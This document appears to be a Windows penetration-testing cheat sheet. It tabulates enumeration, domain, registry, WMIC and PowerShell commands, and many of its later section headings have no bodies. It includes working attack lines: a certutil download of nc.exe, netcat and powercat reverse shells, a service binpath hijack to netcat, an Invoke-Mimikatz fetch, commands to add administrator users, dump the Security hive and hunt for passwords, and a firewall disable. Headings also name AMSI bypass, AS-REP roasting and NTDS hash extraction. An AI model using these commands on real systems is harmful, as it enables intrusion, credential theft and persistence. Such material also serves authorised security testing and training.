Windows
Versions
Number or ID | Versions |
---|---|
NT 3.1 | Windows NT 3.1 (All) |
NT 3.5 | Windows NT 3.5 (All) |
NT 3.51 | Windows NT 3.51 (All) |
NT 4.0 | Windows NT 4.0 (All) |
NT 5.0 | Windows 2000 (All) |
NT 5.1 | Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) |
NT 5.2 | Windows XP (64-bit, Pro 64-bit); Windows Server 2003 & R2 (Standard, Enterprise); Windows Home Server |
NT 6.0 | Windows Vista (Starter, Home Basic, Home Premium, Business, Enterprise, Ultimate) |
NT 6.1 | Windows 7 (Starter, Home, Pro, Enterprise, Ultimate); Windows Server 2008 R2 (Foundation, Standard, Enterprise) |
NT 6.2 | Windows 8 (x86/64, Pro, Enterprise), Windows RT (ARM); Windows Phone 8; Windows Server 2012 (Foundation, Essentials, Standard) |
Files
Command | Explanation |
---|---|
%SYSTEMROOT% | Usually C:\Windows |
%SYSTEMROOT%\System32\drivers\etc\hosts | Local hostname-to-IP mappings (hosts file) |
%SYSTEMROOT%\System32\drivers\etc\networks | Network name-to-address mappings |
%SYSTEMROOT%\System32\config\SAM | Usernames and password hashes |
%SYSTEMROOT%\repair\SAM | Copy of the SAM |
%SYSTEMROOT%\System32\config\RegBack\SAM | Backup copy of the SAM |
%WINDIR%\system32\config\AppEvent.Evt | Application event log |
%WINDIR%\system32\config\SecEvent.Evt | Security event log |
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\ | Startup path (all users) |
%USERPROFILE%\Start Menu\Programs\Startup\ | Startup path (current user) |
%SYSTEMROOT%\Prefetch | Prefetch folder (records of executed programs) |
Launcher paths
For Windows NT 6.1, 6.0
For Windows NT 5.2, 5.1, 5.0
For Windows 9x
For Windows NT 4.0, 3.51, 3.50
System information commands
Command | Explanation |
---|---|
ver | Operating system version |
sc query state= all | Show all services (note the space after state=) |
tasklist /svc | Show processes with their services |
tasklist /m | Show all processes with their loaded DLLs |
tasklist /S ip /v | Processes running on remote host ip |
taskkill /PID pid /F | Forcibly terminate the process with the given PID |
systeminfo /S ip /U domain\user /P Pwd | Retrieve system information from a remote host |
reg query \\ip\RegDomain\Key /v VALUE | Query the registry on a remote host (/s = all values) |
reg query HKLM /f password /t REG_SZ /s | Search the registry for passwords |
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer | WSUS server address |
fsutil fsinfo drives | List drives (needs admin access) |
dir /a /s /b c:\*.pdf | Search for all PDF files |
dir /a /b c:\windows\kb* | Search for installed patches |
findstr /si password *.txt *.xml *.xls | Search files for passwords |
tree /F /A c: > tree.txt | Save the folder tree of drive C: to a file |
reg save HKLM\Security security.hive | Save the Security hive to a file |
echo %USERNAME% | Current user |
whoami /priv | Current user privileges |
Net / domain commands
Command | Description |
---|---|
net view /domain | Hosts in the current domain |
net view /domain:[MYDOMAIN] | Hosts in [MYDOMAIN] |
net user /domain | All users of the current domain |
net user user pass /add | Add a local user |
net localgroup "Administrators" user /add | Add user to the local Administrators group |
net accounts /domain | Domain password policy |
net localgroup "Administrators" | List local administrators |
net group /domain | List domain groups |
net group "Domain Admins" /domain | List members of Domain Admins |
net group "Domain Controllers" /domain | List DCs of the current domain |
net share | List SMB shares |
net session \| find "\\" | List active SMB sessions |
net user user /ACTIVE:yes /domain | Activate (unlock) a domain account |
net user user "newpassword" /domain | Change a domain user's password |
net share share=c:\share /GRANT:Everyone,FULL | Share a folder with full access for Everyone |
Remote commands
Command | Description |
---|---|
tasklist /S ip /v | Processes running on ip |
systeminfo /S ip /U domain\user /P Pwd | System information of ip |
net view \\ip | Shares on ip |
net use \\ip | Connect to the file system of ip |
net use z: \\ip\share password /user:DOMAIN\user | Map a drive with the specified credentials |
reg add \\ip\regkey\value | Add a registry key on ip |
sc \\ip create service binpath= C:\Windows\System32\x.exe start= auto | Create a remote service (note the space after binpath= and start=) |
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:\windows\temp\nc.exe | Download a file from ip to the current system via cmd.exe |
cmd.exe /c c:\windows\temp\nc.exe ip port -e cmd.exe | Reverse shell |
nc.exe -lvvp port | Listen on the specified port |
python3 -m http.server port | Start a web server on port |
xcopy /s \\ip\dir C:\local | Copy a directory from ip |
shutdown /m \\ip /r /t 0 /f | Restart the system ip |
Network commands
Command | Description |
---|---|
ipconfig /all | IP configuration |
ipconfig /displaydns | DNS cache |
netstat -ano | Show connections with owning PIDs |
netstat -anop tcp 1 | Netstat loop (refresh every second, TCP only) |
netstat -an \| findstr LISTENING | Listening ports |
route print | Routing table |
arp -a | System MAC addresses (from the ARP table) |
nslookup, set type=any, ls -d domain > results.txt, exit | Attempt a DNS zone transfer |
nslookup -type=SRV _www._tcp.url.com | Domain SRV lookup (ldap, kerberos, sip) |
tftp -I ip GET remotefile | File transfer with TFTP |
netsh wlan show profiles | Stored wireless profiles |
netsh firewall set opmode disable | Disable firewall (old syntax) |
netsh wlan export profile folder=. key=clear | Export Wi-Fi profiles with keys in plaintext |
netsh interface ip show interfaces | List interface IDs and MTUs |
netsh interface ip set address local static ip nmask gw ID | Set a static IP |
netsh interface ip set dns local static ip | Configure the DNS server |
netsh interface ip set address local dhcp | Set interface to use DHCP |
Functional commands
Command | Description |
---|---|
type file | Show file contents |
del path\*.* /a /s /q /f | Delete all files under path |
find /I "str" filename | Search a file for a string (case-insensitive) |
command \| find /c /v "" | Count the lines of a command's output |
at HH:MM file [args] (e.g. at 14:45 cmd /c) | Schedule file execution |
runas /user:user "file [args]" | Run a file as a specific user |
shutdown /r /t 0 | Restart |
sc stop UsoSvc | Stop the UsoSvc service |
sc start UsoSvc | Start the UsoSvc service |
sc config UsoSvc binpath= "c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe" | Change the executable path of the UsoSvc service |
tr -d '\15\32' < win.txt > unix.txt | Remove CR and ^Z characters (on *nix) |
makecab file | Compress a file |
wusa.exe /uninstall /kb:### | Remove a patch |
wevtutil qe Application /c:40 /f:text /rd:true | Query the event log from the command line |
lusrmgr.msc | Open Local Users and Groups |
services.msc | Open the Services console |
taskmgr.exe | Open Task Manager |
secpol.msc | Open Local Security Policy |
eventvwr.msc | Open Event Viewer |
MISC. commands
Locking the workstation
Disable Windows Firewall
Create port forward (*need admin access)
enable cmd
PSEXEC command
Remote file execution with specific identity information
Execution of command with special hash
Run the command on the remote system
Terminal service (RDP)
Start RDP
RDP tunnel from port 443 (need to restart the terminal service)
Remove network authentication by adding an exception in the firewall
Import task from XML file
WMIC command
Command | Description |
---|---|
wmic [alias] get /? | List the properties of an alias |
wmic [alias] call /? | List the callable methods of an alias |
wmic process list full | Process properties |
wmic startup | List startup entries |
wmic service | List services |
wmic ntdomain list | Domain and DC information |
wmic qfe | List all installed patches |
wmic process call create "process_name" | Run a process |
wmic process where name="process" call terminate | Terminate a process |
wmic logicaldisk get description,name | Display logical drives |
wmic cpu get DataWidth /format:list | Show whether the system is 32-bit or 64-bit |
wmic service where started=true get name,startname | Show running services and their logon accounts |
WMIC [alias] [where] [clause]
Run the file in smb with specific identity information
Remove the software
Remote user access
Show processes in real time
Start RDP
The list of times that the user has entered
Search services for unquoted routes
Copy of Volume shadow
POWERSHELL environment
Command | Description |
---|---|
stop-transcript | Stop recording the session |
get-content file | Display the contents of a file |
get-help command -examples | Display examples for a command |
get-command *string* | Search for cmdlets |
get-service | Show services (stop-service, start-service) |
get-wmiobject -class win32_service | Show services via WMI (includes the logon account) |
$PSVersionTable | Show PowerShell version |
powershell.exe -version 2.0 | Run PowerShell 2.0 from version 3.0 |
get-service \| measure-object | Count the services returned |
get-psdrive | List PSDrives |
get-process \| select -expandproperty name | Show process names only |
get-help * -parameter credential | Find cmdlets that accept credentials |
get-wmiobject -list *network* | List network-related WMI classes |
[Net.DNS]::GetHostEntry("ip") | DNS lookup |
powershell.exe wget "http://10.10.10.10/nc.exe" -outfile "c:\temp\nc.exe" | Download and save a file |
powershell.exe -c "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/powercat.ps1'); powercat -c 10.10.10.100 -p 4444 -e cmd" | Reverse shell |
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1 | Web server on port 8050 |
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | Invoke-Mimikatz script |
Import-Module .\Invoke-Mimikatz.ps1 | Load a .ps1 module |
iwr -uri http://10.10.10.10/file -o file.exe | Download and save a file |
Bypass AMSI
Or
Disable realtimemonitoring
List of all users
List of all domains
Get AD credentials using donotrequirepreauth
Deleting security reports and programs (for SVR01)
Extract the version of the operating system inside the CSV file
List of running services
Using ps drive for permanent sharing
Files written on 8/20
Get file from http
tcp port connections (scanner)
Ping command with 500 millisecond timeout
Basic authentication window
Run the exe file (from cmd.exe) every 4 hours between 8 and 11 August 2013, from 0800 to 1700
Run Powershell as
Upload with powershell
Email sender
Activating remote access to powershell (requires identity information)
hostname and ip list for all domains
Download from Powershell from specific path
Display Powershell data
Using powershell to run meterpreter from memory
In the attacking system
Start the listener in the attacking system
On the target system (run powershell(x86))
Encodemeterpreter.ps1 [7]
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer
Using powershell to start meterpreter (second method)
On bt attack box
In the attacking system
Start the listener in the attacking system
In the target system (1: download the shell code, 2: execute)
Identification of vulnerable domains with powerup
Windows registry
operating system information
Product Name
Installation Date
registered name
System boot information
Time zone information (in minutes from UTC)
Mapped network drives
Mounted devices
usb devices
Activation of IP forwarding
Password keys: LSA secrets can contain VPN, autologon and other passwords
Audit policy information
Kernel and user services
software installed in the system
Installed software for the user
Latest documents
The last positions of the user
URLs typed
MRU lists
The last registry key used
Launch paths
Activation of Remote Desktop
Get Windows information with dsquery
List of domain users
List of domain groups domain=victim.com
List of domain administrators
List of user groups
Get the entered user id
List of users who have not been active in the last two weeks
Add user
Delete user
List of domain operating systems
List of site names
List of all subnets in the site
List of services in the site
Get domain servers
DC list of the site
Script writing
Batch script variables must be written with %%, for example %%i
Create ping sweep
Create a loop inside the file
domain brute forcer operation
Account lockout (lockout.bat)
DHCP exhaustion operation
DNS reverse lookup process
Search all the paths to find the files that contain PASS and display the details of that file
Malicious domain simulation (Application for IDS test)
Operation of IE web looper (traffic generator)
Get access to executive services
Spinning Reboot (replace /R with /S to shutdown):
Create a shell using vbs (requires identity information)
Scheduling the task
Scheduling the task (ST=start time, SD=start date, ED=end date) *need admin access
Always schedule task [10]
Instructions for working with smb
Log in with a specific user
Login without password
Change password
Show shared route
Show the specified route
Login to Shell
Get users along with password hash
Guess different smb passwords
with metasploit
with medusa
rpcclient commands
entering the system
Show user information
Show users
Show permissions
Change user access
Show printers
NTLM extraction from ntds.dit file
Gather information using SharpHound
Gather information about Sql Server
Obtain AS-REP Roast hash
List of available ips without using nmap
Or
Service identification with Test-WSMan
Enumerate OUs
Retrieve users in the 'ICS' OU
SharpHound Collect
Impersonate Token of nuclear\vdadmin (on psexec session)